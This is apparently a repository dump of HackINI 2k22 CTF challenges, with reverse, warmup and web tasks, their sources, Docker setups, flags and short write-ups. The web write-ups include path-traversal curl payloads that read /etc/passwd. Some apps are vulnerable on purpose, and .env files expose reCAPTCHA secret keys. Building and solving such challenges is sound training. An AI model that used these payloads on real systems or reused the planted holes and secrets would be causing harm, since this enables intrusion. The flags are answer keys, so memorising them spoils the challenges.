ultimaty packed. 8 | - Help me to unpack it. 9 | ## Solution 10 | 11 | Solution of the challenge can be found [here](solution/). 12 | -------------------------------------------------------------------------------- /reverse/6pack/challenge/challenge.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/reverse/6pack/challenge/challenge.exe -------------------------------------------------------------------------------- /reverse/6pack/solution/README.md: -------------------------------------------------------------------------------- 1 | # 6-pack 2 | 3 | ## Write-up 4 | - the exe binary is packed with upx. 5 | - use this to unpack the binary. 6 | `upx -d challenge.exe` 7 | - then use ghidra decompiler to read the code. 8 | ## Flag 9 | 10 | `shellmates{uPx_1S_4_N1c3_w4Y_F0r_P4Ck1n9_B1n4R132}` 11 | -------------------------------------------------------------------------------- /reverse/6pack/source/source.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | char flag[51]; 5 | int flag_arr[51] = {115,104,101,108,108,109,97,116,101,115,123,117,80,120,95,49,83,95,52,95,78,49,99,51,95,119,52,89,95,70,48,114,95,80,52,67,107,49,110,57,95,66,49,110,52,82,49,51,50,125}; 6 | char tmp[2]; 7 | int main() { 8 | for(int i=0;i<50;i++){ 9 | sprintf(tmp,"%c",flag_arr[i]); 10 | strcat(flag,tmp); 11 | } 12 | char input[51]; 13 | printf("Input flag : "); 14 | fgets(input, 51, stdin); 15 | if (!strcmp(input,flag)) { 16 | printf("Correct flag!\n"); 17 | } else { 18 | printf("Wrong flag!\nTry Again."); 19 | } 20 | return 0; 21 | } 22 | -------------------------------------------------------------------------------- /reverse/6pack/source/source.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/reverse/6pack/source/source.exe -------------------------------------------------------------------------------- /reverse/README.md: -------------------------------------------------------------------------------- 1 | # Reverse 2 | 3 | This directory contains challenges related to the `Reverse` category. Please consider reading the [contribution guidelines](../CONTRIBUTING.md) before making any contribution. 4 | -------------------------------------------------------------------------------- /reverse/baby-asm/README.md: -------------------------------------------------------------------------------- 1 | # baby asm 2 | 3 | **`Author:`** [ouxs](https://github.com/ouxs-19) 4 | 5 | ## Description 6 | 7 | > Put your tools aside for a second and start reading some real code. 8 | 9 | ## Solution 10 | 11 | Solution of the challenge can be found [here](solution/). -------------------------------------------------------------------------------- /reverse/baby-asm/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "baby asm" 2 | author: "Ouxs" 3 | author_link: "https://github.com/ouxs-19/" 4 | category: reverse 5 | 6 | difficulty: easy 7 | description: | 8 | > Put your tools aside for a second and start reading some real code. 9 | **Author** : Ouxs 10 | 11 | flags: 12 | - shellmates{B4CK_T0_Th3_r0075!!} 13 | 14 | files: 15 | - challenge/chall.asm 16 | - challenge/enc 17 | 18 | tags: 19 | - easy 20 | 21 | value: 500 22 | type: dynamic 23 | extra: 24 | initial: 500 25 | decay: 15 26 | minimum: 50 27 | 28 | state: visible 29 | version: "0.1" 30 | -------------------------------------------------------------------------------- /reverse/baby-asm/challenge/chall: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/reverse/baby-asm/challenge/chall -------------------------------------------------------------------------------- /reverse/baby-asm/challenge/chall.asm: -------------------------------------------------------------------------------- 1 | 2 | bits 64 3 | 4 | section .data 5 | prompt: db 'Which file you want to encrypt : ', 10, 0 6 | 7 | section .text 8 | global _start 9 | _start: 10 | sub rsp, 64 11 | mov rax, 1 12 | mov rdi, 1 13 | mov rsi, prompt 14 | mov rdx, 34 15 | syscall 16 | xor rax, rax 17 | xor rdi, rdi 18 | mov rsi, rsp 19 | mov rdx, 64 20 | syscall 21 | cmp byte[rsp+rax-1],0xa 22 | jne no_nl 23 | mov byte[rsp+rax-1],0 24 | no_nl: 25 | mov rax, 2 26 | mov rdi, rsp 27 | xor rsi, rsi 28 | xor rdx, rdx 29 | syscall 30 | mov r8, rax 31 | loop: 32 | xor rax, rax 33 | mov rdi, r8 34 | mov rsi, rsp 35 | mov rdx, 1 36 | syscall 37 | cmp rax, 0 38 | je end 39 | mov al, byte[rsp] 40 | cmp al, 32 41 | jl func1 42 | cmp al, 64 43 | jl func2 44 | cmp al, 96 45 | jl func3 46 | jmp func4 47 | func1: 48 | add al, 64 49 | jmp func 50 | func2: 51 | sub al, 32 52 | jmp func 53 | func3: 54 | add al, 32 55 | jmp func 56 | func4: 57 | sub al, 64 58 | jmp func 59 | func: 60 | mov byte[rsp], al 61 | mov rax, 1 62 | mov rdi, 1 63 | mov rsi, rsp 64 | mov rdx, 1 65 | syscall 66 | jmp loop 67 | 68 | end: 69 | mov rax, 0x3c 70 | xor rdi, rdi 71 | syscall 72 | -------------------------------------------------------------------------------- /reverse/baby-asm/challenge/chall.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/reverse/baby-asm/challenge/chall.o -------------------------------------------------------------------------------- /reverse/baby-asm/challenge/enc: -------------------------------------------------------------------------------- 1 | Which file you want to encrypt : 2 | 3(%,,-!4%3;bcktt(2= -------------------------------------------------------------------------------- /reverse/baby-asm/challenge/flag.txt: -------------------------------------------------------------------------------- 1 | shellmates{B4CK_T0_Th3_r0075!!} -------------------------------------------------------------------------------- /reverse/baby-asm/soultion/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | 4 | def decode(char): 5 | n = ord(char) 6 | if n < 32: 7 | return chr(n + 32) 8 | elif n < 64: 9 | return chr(n + 64) 10 | elif n < 96: 11 | return chr(n - 64) 12 | else: 13 | return chr(n - 32) 14 | 15 | 16 | with open("enc", "rb") as f: 17 | enc = f.read().decode().split("\n")[1] 18 | 19 | flag = "".join(decode(char) for char in enc) 20 | print(f"The flag : {flag}") 21 | -------------------------------------------------------------------------------- /reverse/magic/README.md: -------------------------------------------------------------------------------- 1 | # magic 2 | 3 | **`Author:`** [Muhammad](https://github.com/muhammedBkf) 4 | 5 | ## Description 6 | 7 | > Only true wizards can find my magic secret. 8 | > The flag looks like: shellmates{magic_secret}. 9 | [chal](challenge/chall) 10 | 11 | ## Solution 12 | 13 | Solution of the challenge can be found [here](solution/). 14 | -------------------------------------------------------------------------------- /reverse/magic/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "magic" 2 | author: "Muhammad" 3 | author_link: "https://github.com/muhammedBkf" 4 | category: reverse 5 | difficulty: ezmed 6 | description: | 7 | > Only true wizards can find my magic secret. 8 | > The flag looks like: shellmates{magic_secret}. 9 | **Author** : Muhammad 10 | flags: 11 | - shellmates{ELF_m4G!c_ByTes_:D} 12 | files: 13 | - challenge/chall 14 | # DO NOT CHANGE 15 | tags: 16 | - easy/medium 17 | value: 500 18 | type: dynamic 19 | extra: 20 | initial: 500 21 | decay: 15 22 | minimum: 50 23 | state: visible 24 | version: "0.1" 25 | -------------------------------------------------------------------------------- /reverse/magic/challenge/chall: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/reverse/magic/challenge/chall -------------------------------------------------------------------------------- /reverse/magic/challenge/chall.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #define SECRET_LENGTH 18 7 | 8 | int compare_with_secret(char * input); 9 | int mudolo(int op1,int op2); 10 | int main() { 11 | printf("You think that you found my magic secret?\nTry it out : "); 12 | char input[SECRET_LENGTH + 1]; 13 | scanf("%18s", input); 14 | if (compare_with_secret(input)) printf("Congrats you wizard!\n"); 15 | else printf("Wrong! Try again!\n"); 16 | return 0; 17 | } 18 | 19 | int mudolo(int op1,int op2){ 20 | return op1%op2; 21 | }; 22 | 23 | int compare_with_secret(char * input) { 24 | char cipher[SECRET_LENGTH + 1] = "\x3a\x9\xa\x19\x12\x71\xb\x67\x1c\x1a\xe\x3f\x2b\x20\x3f\x19\x45\x1"; 25 | char c; 26 | char buf[256]; 27 | memset(buf,'\0',256); 28 | readlink("/proc/self/exe", buf, 255); 29 | FILE * fd = fopen(buf, "rb"); 30 | 31 | for (char i = 0; i < SECRET_LENGTH; ++i) { 32 | fseek(fd, mudolo(i,4), SEEK_SET); 33 | fread( & c, 1, 1, fd); 34 | input[i] = c ^ input[i]; 35 | } 36 | return !memcmp(cipher, input, SECRET_LENGTH); 37 | } -------------------------------------------------------------------------------- /reverse/magic/challenge/pychall.py: -------------------------------------------------------------------------------- 1 | FLAG="ELF_m4G!c_ByTes_:D" 2 | print(len(FLAG)) 3 | KEY="\x7f\x45\x4c\x46" 4 | for i in range(len(FLAG)): 5 | print(f'\\x{hex(ord(FLAG[i])^ord(KEY[i%len(KEY)])).lstrip("0x")}',end="") -------------------------------------------------------------------------------- /warmup/README.md: -------------------------------------------------------------------------------- 1 | # Warmup 2 | 3 | This directory contains challenges related to the `Warmup` category. Please consider reading the [contribution guidelines](../CONTRIBUTING.md) before making any contribution. 4 | 5 | -------------------------------------------------------------------------------- /warmup/my-first-ncat/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:18.04 2 | 3 | RUN apt-get update && \ 4 | apt-get install -y socat && \ 5 | rm -rf /var/lib/apt/lists/* 6 | 7 | RUN useradd ctf && \ 8 | mkdir /challenge 9 | 10 | COPY challenge /challenge 11 | 12 | WORKDIR /challenge 13 | 14 | RUN chmod +x entrypoint.sh chall.sh && \ 15 | chown -R root:root . 16 | 17 | USER ctf 18 | 19 | EXPOSE 1337 20 | 21 | ENTRYPOINT ["./entrypoint.sh"] 22 | -------------------------------------------------------------------------------- /warmup/my-first-ncat/README.md: -------------------------------------------------------------------------------- 1 | # My first ncat 2 | 3 | **`Author:`** [chenx3n](https://github.com/malikDaCoda) 4 | 5 | ## Description 6 | 7 | Most challenges are accessible remotely using `ncat`. 8 | On debian-based Linux systems, you can install `ncat` using the following command: 9 | 10 | ```bash 11 | sudo apt install ncat 12 | ``` 13 | 14 | You can connect to the challenge using the command below. 15 | 16 | **Connect with**: `ncat -v --ssl my-first-ncat.challs.shellmates.club 443` 17 | 18 | ## Solution 19 | 20 | Solution of the challenge can be found [here](solution/). 21 | 22 | -------------------------------------------------------------------------------- /warmup/my-first-ncat/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "My first ncat" 2 | author: "chenx3n" 3 | author_link: "https://github.com/malikDaCoda" 4 | 5 | category: warmup 6 | difficulty: beginner 7 | 8 | description: | 9 | Most challenges are accessible remotely using `ncat`. 10 | On debian-based Linux systems, you can install `ncat` using the following command: 11 | 12 | ```bash 13 | sudo apt install ncat 14 | ``` 15 | 16 | You can connect to the challenge using the command below. 17 | 18 | **Author**: chenx3n 19 | 20 | connection_info: ncat -v --ssl my-first-ncat.challs.shellmates.club 443 21 | 22 | image: gcr.io/glowing-reserve-336013/my-first-ncat 23 | 24 | value: 50 25 | type: standard 26 | 27 | flags: 28 | - shellmates{NcAt_1s_c000LL} 29 | 30 | tags: 31 | - beginner 32 | 33 | state: visible 34 | 35 | version: "0.1" 36 | -------------------------------------------------------------------------------- /warmup/my-first-ncat/challenge/chall.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | echo "shellmates{NcAt_1s_c000LL}" 4 | -------------------------------------------------------------------------------- /warmup/my-first-ncat/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | EXEC="./chall.sh" 4 | PORT=1337 5 | 6 | socat -dd -T300 tcp-l:$PORT,reuseaddr,fork,keepalive exec:"$EXEC",stderr 7 | -------------------------------------------------------------------------------- /warmup/my-first-ncat/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.8' 2 | 3 | services: 4 | 5 | server: 6 | build: . 7 | ports: 8 | - '1650:1337' 9 | deploy: 10 | replicas: 1 11 | restart_policy: 12 | condition: on-failure 13 | resources: 14 | limits: 15 | memory: 50M 16 | healthcheck: 17 | test: socat - TCP4:localhost:1337 || exit 1 18 | interval: 60s 19 | timeout: 2s 20 | retries: 5 21 | -------------------------------------------------------------------------------- /warmup/my-first-ssh/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.8 2 | 3 | RUN apt-get update \ 4 | && DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends openssh-server sudo systemd rsyslog 5 | 6 | RUN useradd -s /bin/bash ctf \ 7 | && echo 'ctf:ctf' | chpasswd \ 8 | && usermod -aG sudo ctf 9 | 10 | WORKDIR /challenge 11 | 12 | COPY challenge/flag.txt / 13 | COPY challenge/sshd_config /etc/ssh/sshd_config 14 | 15 | EXPOSE 22 16 | 17 | ENTRYPOINT service rsyslog start \ 18 | && service ssh start \ 19 | && tail -f --retry /var/log/auth.log 20 | -------------------------------------------------------------------------------- /warmup/my-first-ssh/README.md: -------------------------------------------------------------------------------- 1 | # My first ssh 2 | 3 | **`Author:`** [chenx3n](https://github.com/malikDaCoda) 4 | 5 | ## Description 6 | 7 | Connect with SSH using the command below and try to read the flag at `/flag.txt`. 8 | Make sure to have `openssl` installed: 9 | 10 | ```bash 11 | sudo apt install openssl 12 | ``` 13 | 14 | You can connect to the challenge using the command below. 15 | 16 | **Connect with**: `ncat -v --ssl my-first-ssh.challs.shellmates.club 443` 17 | 18 | ## Solution 19 | 20 | Solution of the challenge can be found [here](solution/). 21 | 22 | -------------------------------------------------------------------------------- /warmup/my-first-ssh/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "My first ssh" 2 | author: "chenx3n" 3 | author_link: "https://github.com/malikDaCoda" 4 | 5 | category: warmup 6 | difficulty: beginner 7 | 8 | description: | 9 | Connect with SSH using the command below and try to read the flag at `/flag.txt`. 10 | Make sure to have `openssl` installed: 11 | 12 | ```bash 13 | sudo apt install openssl 14 | ``` 15 | 16 | **Password**: ctf 17 | 18 | **Author**: chenx3n 19 | 20 | connection_info: ssh ctf@my-first-ssh -o ProxyCommand="openssl s_client -quiet -connect my-first-ssh.challs.shellmates.club:443 -servername my-first-ssh.challs.shellmates.club" 21 | 22 | image: gcr.io/glowing-reserve-336013/my-first-ssh 23 | 24 | value: 50 25 | type: standard 26 | 27 | flags: 28 | - shellmates{$sH_1s_FUn} 29 | 30 | tags: 31 | - beginner 32 | 33 | state: visible 34 | 35 | version: "0.1" 36 | -------------------------------------------------------------------------------- /warmup/my-first-ssh/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | EXEC="./chall.sh" 4 | PORT=1337 5 | 6 | socat -dd -T300 tcp-l:$PORT,reuseaddr,fork,keepalive exec:"$EXEC",stderr 7 | -------------------------------------------------------------------------------- /warmup/my-first-ssh/challenge/flag.txt: -------------------------------------------------------------------------------- 1 | shellmates{$sH_1s_FUn} 2 | -------------------------------------------------------------------------------- /warmup/my-first-ssh/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.3' 2 | 3 | services: 4 | 5 | server: 6 | build: . 7 | ports: 8 | - '1651:22' 9 | deploy: 10 | replicas: 1 11 | restart_policy: 12 | condition: on-failure 13 | resources: 14 | limits: 15 | memory: 100M 16 | -------------------------------------------------------------------------------- /web/HEADache/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:alpine3.15 2 | 3 | COPY app /app 4 | 5 | WORKDIR /app 6 | 7 | RUN pip3 install -r requirements.txt 8 | 9 | EXPOSE 1337 10 | 11 | ENTRYPOINT python app.py -------------------------------------------------------------------------------- /web/HEADache/README.md: -------------------------------------------------------------------------------- 1 | # HEADache 2 | 3 | **`Author:`** [Muhammad](https://github.com/muhammedBkf) 4 | 5 | ## Description 6 | > Wanna learn about some types of headache? 7 | > Let's dig right into it! 8 | **Author** : Muhammad 9 | 10 | ## Solution 11 | 12 | Solution of the challenge can be found [here](solution/). 13 | -------------------------------------------------------------------------------- /web/HEADache/app/app.py: -------------------------------------------------------------------------------- 1 | from flask import Flask,url_for,request,render_template 2 | 3 | app = Flask(__name__) 4 | 5 | @app.route("/") 6 | def hello_world(): 7 | polite=False 8 | if request.headers.get('wanna-something')=="can-i-have-a-flag-please": 9 | polite=True 10 | return render_template('index.html',static=url_for('static', filename='bulma.min.css'),polite=polite) 11 | 12 | 13 | if __name__ == '__main__': 14 | app.run(host='0.0.0.0', port=1337) -------------------------------------------------------------------------------- /web/HEADache/app/requirements.txt: -------------------------------------------------------------------------------- 1 | click==8.1.3 2 | Flask==2.1.2 3 | itsdangerous==2.1.2 4 | Jinja2==3.1.2 5 | MarkupSafe==2.1.1 6 | Werkzeug==2.1.2 7 | -------------------------------------------------------------------------------- /web/HEADache/app/static/meme.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/web/HEADache/app/static/meme.png -------------------------------------------------------------------------------- /web/HEADache/app/templates/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Headache 7 | 8 | 14 | 15 | 16 | 17 |
18 |
19 |

20 | HEADACHE 21 |

22 |

In this challenge you'll discover some types of Headache!

23 |

Otherwise, if you want the flag just ask for it politely :D

{% if polite %} 24 |

Ok! There u go : shellmates{hTTp_H34d37R5_&_p0L173N355_c4n_B3_U53FULL}

{% endif %} 25 |
26 |
27 | 28 | 29 | -------------------------------------------------------------------------------- /web/HEADache/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "HEADache" 2 | author: "Muhammad" 3 | author_link: "https://github.com/muhammedBkf" 4 | category: web 5 | difficulty: easy 6 | description: | 7 | > Wanna learn about some types of headache? 8 | > Let's dig right into it! 9 | **Author** : Muhammad 10 | flags: 11 | - shellmates{hTTp_H34d37R5_&_p0L173N355_c4n_B3_U53FULL} 12 | 13 | connection_info: https://headache.challs.shellmates.club 14 | 15 | files: 16 | - app/app.py 17 | 18 | tags: 19 | - easy 20 | 21 | # DO NOT CHANGE 22 | # 23 | value: 500 24 | type: dynamic 25 | extra: 26 | initial: 500 27 | decay: 15 28 | minimum: 50 29 | state: visible 30 | version: "0.1" 31 | -------------------------------------------------------------------------------- /web/HEADache/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.8' 2 | 3 | services: 4 | web: 5 | build: 6 | context: . 7 | dockerfile: Dockerfile 8 | ports: 9 | - '1337:1337' 10 | deploy: 11 | replicas: 1 12 | restart_policy: 13 | condition: on-failure 14 | -------------------------------------------------------------------------------- /web/HEADache/solution/README.md: -------------------------------------------------------------------------------- 1 | # HEADache 2 | 3 | ## Write-up 4 | 5 | After checking, the `app.py` we can see that it's checking if the header `wanna-something` has the value `can-i-have-a-flag-please` in order to return the flag, so we only need to set it. 6 | 7 | ```bash 8 | curl https://headache.challs.shellmates.club -H "wanna-something: can-i-have-a-flag-please" 9 | ``` 10 | 11 | ## Flag 12 | 13 | `shellmates{hTTp_H34d37R5_&_p0L173N355_c4n_B3_U53FULL}` 14 | -------------------------------------------------------------------------------- /web/README.md: -------------------------------------------------------------------------------- 1 | # Web 2 | 3 | This directory contains challenges related to the `Web` category. Please consider reading the [contribution guidelines](../CONTRIBUTING.md) before making any contribution. 4 | -------------------------------------------------------------------------------- /web/baby-lfi-2/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM php:7.3-apache 2 | 3 | RUN apt-get update 4 | 5 | COPY ./challenge/* /var/www/html/ 6 | 7 | RUN echo "\nshellmates{yOU_M4De_yOUr_waY_7hRough_iT}" >> /etc/passwd 8 | 9 | WORKDIR /var/www/html -------------------------------------------------------------------------------- /web/baby-lfi-2/README.md: -------------------------------------------------------------------------------- 1 | # baby lfi 2 2 | 3 | **`Author:`** [Anis Chebah](https://github.com/) 4 | 5 | ## Description 6 | 7 | > What about making things a bit harder ? 8 | 9 | ## Solution 10 | 11 | Solution of the challenge can be found [here](solution/). 12 | -------------------------------------------------------------------------------- /web/baby-lfi-2/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "baby lfi 2" 2 | author: "Anis Chebah" 3 | 4 | category: web 5 | difficulty: easy 6 | 7 | description: | 8 | > What about making things a bit harder ? 9 | 10 | **Author :** Anis Chebah 11 | 12 | connection_info: https://baby-lfi-2.challs.shellmates.club 13 | 14 | #image: gcr.io/glowing-reserve-336013/ 15 | 16 | value: 500 17 | type: dynamic 18 | 19 | tags: 20 | - baby 21 | - php 22 | - easy 23 | 24 | extra: 25 | initial: 500 26 | decay: 15 27 | minimum: 50 28 | 29 | flags: 30 | - shellmates{yOU_M4De_yOUr_waY_7hRough_iT} 31 | 32 | state: visible 33 | 34 | version: "0.1" 35 | -------------------------------------------------------------------------------- /web/baby-lfi-2/challenge/en.php: -------------------------------------------------------------------------------- 1 | Hello there, this is a basic example, just a proof of concept ;)" ; 3 | ?> -------------------------------------------------------------------------------- /web/baby-lfi-2/challenge/fr.php: -------------------------------------------------------------------------------- 1 | Bonjour, ceci est un exemple de base, juste une preuve de concept ;)" ; 3 | ?> -------------------------------------------------------------------------------- /web/baby-lfi-2/challenge/main.css: -------------------------------------------------------------------------------- 1 | h1 { 2 | text-align: center; 3 | } 4 | .token.atrule, 5 | .token.attr-value, 6 | .token.keyword { 7 | color: #81032d; 8 | } 9 | .token.property, 10 | .token.tag, 11 | .token.boolean, 12 | .token.number, 13 | .token.constant, 14 | .token.symbol, 15 | .token.deleted { 16 | color: #6a50eb; 17 | } 18 | .token.selector, 19 | .token.attr-name, 20 | .token.string, 21 | .token.char, 22 | .token.builtin, 23 | .token.inserted { 24 | color: #ff6d48; 25 | } 26 | .token.function { 27 | color: #007580; 28 | } 29 | .code-block { 30 | border: 2px solid #393c5563; 31 | border-radius: 4px; 32 | padding-top: 4px; 33 | padding-left: 4px; 34 | } 35 | -------------------------------------------------------------------------------- /web/baby-lfi-2/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.8' 2 | 3 | services: 4 | 5 | web: 6 | build: 7 | context: . 8 | dockerfile: Dockerfile 9 | ports: 10 | - '8080:80' 11 | healthcheck: 12 | test: curl -I --fail http://localhost/ || exit 1 13 | interval: 60s 14 | timeout: 2s 15 | retries: 5 -------------------------------------------------------------------------------- /web/baby-lfi-2/solution/README.md: -------------------------------------------------------------------------------- 1 | # baby lfi 2 2 | 3 | ## Write-up 4 | 5 | ```bash 6 | curl -v '[DOMAIN]?language=./languages/../../../../etc/passwd' 7 | ``` 8 | 9 | ## Flag 10 | 11 | `shellmates{yOU_M4De_yOUr_waY_7hRough_iT}` 12 | -------------------------------------------------------------------------------- /web/baby-lfi/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM php:7.3-apache 2 | 3 | RUN apt-get update 4 | 5 | COPY ./challenge/* /var/www/html/ 6 | 7 | RUN echo "\nshellmates{10CA1_F11e_1Nc1US10n_m4y_r3ve4l_in7Er3st1nG_iNf0Rm4t1on}" >> /etc/passwd 8 | 9 | WORKDIR /var/www/html -------------------------------------------------------------------------------- /web/baby-lfi/README.md: -------------------------------------------------------------------------------- 1 | # baby lfi 2 | 3 | **`Author:`** [Anis Chebah](https://github.com/) 4 | 5 | ## Description 6 | 7 | > What is LFI ? 8 | 9 | ## Solution 10 | 11 | Solution of the challenge can be found [here](solution/). 12 | -------------------------------------------------------------------------------- /web/baby-lfi/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "baby lfi" 2 | author: "Anis Chebah" 3 | 4 | category: web 5 | difficulty: easy 6 | 7 | description: | 8 | > What is LFI ? 9 | 10 | **Author :** Anis Chebah 11 | 12 | connection_info: https://baby-lfi.challs.shellmates.club 13 | 14 | 15 | value: 500 16 | type: dynamic 17 | tags: 18 | - baby 19 | - php 20 | - easy 21 | 22 | extra: 23 | initial: 500 24 | decay: 15 25 | minimum: 50 26 | 27 | flags: 28 | - shellmates{10CA1_F11e_1Nc1US10n_m4y_r3ve4l_in7Er3st1nG_iNf0Rm4t1on} 29 | 30 | state: visible 31 | 32 | version: "0.1" 33 | -------------------------------------------------------------------------------- /web/baby-lfi/challenge/en.php: -------------------------------------------------------------------------------- 1 | Hello there, this is a basic example, just a proof of concept ;)" ; 3 | ?> -------------------------------------------------------------------------------- /web/baby-lfi/challenge/fr.php: -------------------------------------------------------------------------------- 1 | Bonjour, ceci est un exemple de base, juste une preuve de concept ;)" ; 3 | ?> -------------------------------------------------------------------------------- /web/baby-lfi/challenge/main.css: -------------------------------------------------------------------------------- 1 | h1 { 2 | text-align: center; 3 | } 4 | .token.atrule, 5 | .token.attr-value, 6 | .token.keyword { 7 | color: #81032d; 8 | } 9 | .token.property, 10 | .token.tag, 11 | .token.boolean, 12 | .token.number, 13 | .token.constant, 14 | .token.symbol, 15 | .token.deleted { 16 | color: #6a50eb; 17 | } 18 | .token.selector, 19 | .token.attr-name, 20 | .token.string, 21 | .token.char, 22 | .token.builtin, 23 | .token.inserted { 24 | color: #ff6d48; 25 | } 26 | .token.function { 27 | color: #007580; 28 | } 29 | .code-block { 30 | border: 2px solid #393c5563; 31 | border-radius: 4px; 32 | padding-top: 4px; 33 | padding-left: 4px; 34 | } 35 | -------------------------------------------------------------------------------- /web/baby-lfi/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.8' 2 | 3 | services: 4 | 5 | web: 6 | build: 7 | context: . 8 | dockerfile: Dockerfile 9 | ports: 10 | - '8080:80' 11 | healthcheck: 12 | test: curl -I --fail http://localhost/ || exit 1 13 | interval: 60s 14 | timeout: 2s 15 | retries: 5 -------------------------------------------------------------------------------- /web/baby-lfi/solution/README.md: -------------------------------------------------------------------------------- 1 | # baby lfi 2 | 3 | ## Write-up 4 | 5 | ```bash 6 | curl -v '[DOMAIN]?language=../../../etc/passwd' 7 | ``` 8 | 9 | ## Flag 10 | 11 | `shellmates{10CA1_F11e_1Nc1US10n_m4y_r3ve4l_in7Er3st1nG_iNf0Rm4t1on}` 12 | -------------------------------------------------------------------------------- /web/challenge-creator/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM buildkite/puppeteer 2 | 3 | COPY app /app 4 | 5 | WORKDIR /app 6 | 7 | RUN npm install 8 | 9 | RUN useradd ctf 10 | 11 | USER ctf 12 | 13 | ENTRYPOINT ["npm", "start"] 14 | -------------------------------------------------------------------------------- /web/challenge-creator/README.md: -------------------------------------------------------------------------------- 1 | # Challenge creator 2 | 3 | **`Author:`** [chenx3n](https://github.com/malikDaCoda) 4 | 5 | ## Description 6 | 7 | > Check out my latest project: Challenge creator! 8 | > It's still in early phase, so the code might look a little dirty. 9 | 10 | **Note :** Flag is stored in the admin's browser cookie 11 | 12 | **Link :** 13 | 14 | ## Solution 15 | 16 | Solution of the challenge can be found [here](solution/). 17 | 18 | -------------------------------------------------------------------------------- /web/challenge-creator/app/.dockerignore: -------------------------------------------------------------------------------- 1 | node_modules 2 | -------------------------------------------------------------------------------- /web/challenge-creator/app/.env: -------------------------------------------------------------------------------- 1 | NODE_ENV="production" 2 | NODE_PORT=5000 3 | FLAG="shellmates{M4$t3r_of_cL1eNT_s1D3_hUsTL3s}" 4 | APP_URL="https://challenge-creator.challs.shellmates.club" 5 | RECAPTCHA_SECRET_KEY="6LcxsckfAAAAALboGz1MrKBiugzjs844dNP_BPfr" 6 | RECAPTCHA_SITE_KEY="6LcxsckfAAAAAIngUXzlw931eegdBWErvFBPZ_K4" 7 | -------------------------------------------------------------------------------- /web/challenge-creator/app/dev.env: -------------------------------------------------------------------------------- 1 | NODE_ENV="development" 2 | NODE_PORT=5000 3 | FLAG="shellmates{test}" 4 | APP_URL="http://localhost:5000" 5 | RECAPTCHA_SECRET_KEY="6LcxsckfAAAAALboGz1MrKBiugzjs844dNP_BPfr" 6 | RECAPTCHA_SITE_KEY="6LcxsckfAAAAAIngUXzlw931eegdBWErvFBPZ_K4" 7 | -------------------------------------------------------------------------------- /web/challenge-creator/app/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "challenge-maker", 3 | "version": "1.0.0", 4 | "description": "Challenge maker", 5 | "main": "index.js", 6 | "author": "chenx3n", 7 | "license": "MIT", 8 | "dependencies": { 9 | "dotenv": "^16.0.0", 10 | "ejs": "^3.1.7", 11 | "express": "^4.18.1", 12 | "express-csp-header": "^5.1.0", 13 | "express-recaptcha": "^5.1.0", 14 | "morgan": "^1.10.0", 15 | "node-fetch": "^2.6.7", 16 | "puppeteer": "^13.7.0" 17 | }, 18 | "scripts": { 19 | "start": "node index.js" 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /web/challenge-creator/app/visiter.js: -------------------------------------------------------------------------------- 1 | const puppeteer = require("puppeteer"); 2 | 3 | const launchOptions = { 4 | args: ["--no-sandbox"], 5 | headless: true, 6 | }; 7 | 8 | const env = { 9 | FLAG: process.env.FLAG, 10 | }; 11 | 12 | async function visit(url) { 13 | const browser = await puppeteer.launch(launchOptions); 14 | const page = await browser.newPage(); 15 | 16 | console.log(`[visiter.visit] Visiting '${url}'`); 17 | 18 | const { host } = new URL(url); 19 | 20 | await page.setCookie({ 21 | name: "FLAG", 22 | value: env.FLAG, 23 | httpOnly: false, 24 | domain: host, 25 | sameSite: "Strict", 26 | }); 27 | 28 | await page.goto(url, { waitUntil: "load", timeout: 10000 }); 29 | 30 | await new Promise((resolve) => setTimeout(resolve, 5000)); 31 | 32 | console.log(`[visiter.visit] Done visiting`); 33 | 34 | await page.close(); 35 | await browser.close(); 36 | } 37 | 38 | module.exports = { visit }; 39 | -------------------------------------------------------------------------------- /web/challenge-creator/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "Challenge creator" 2 | author: "chenx3n" 3 | author_link: "https://github.com/malikDaCoda" 4 | 5 | category: web 6 | difficulty: extreme 7 | 8 | description: | 9 | > Check out my latest project: 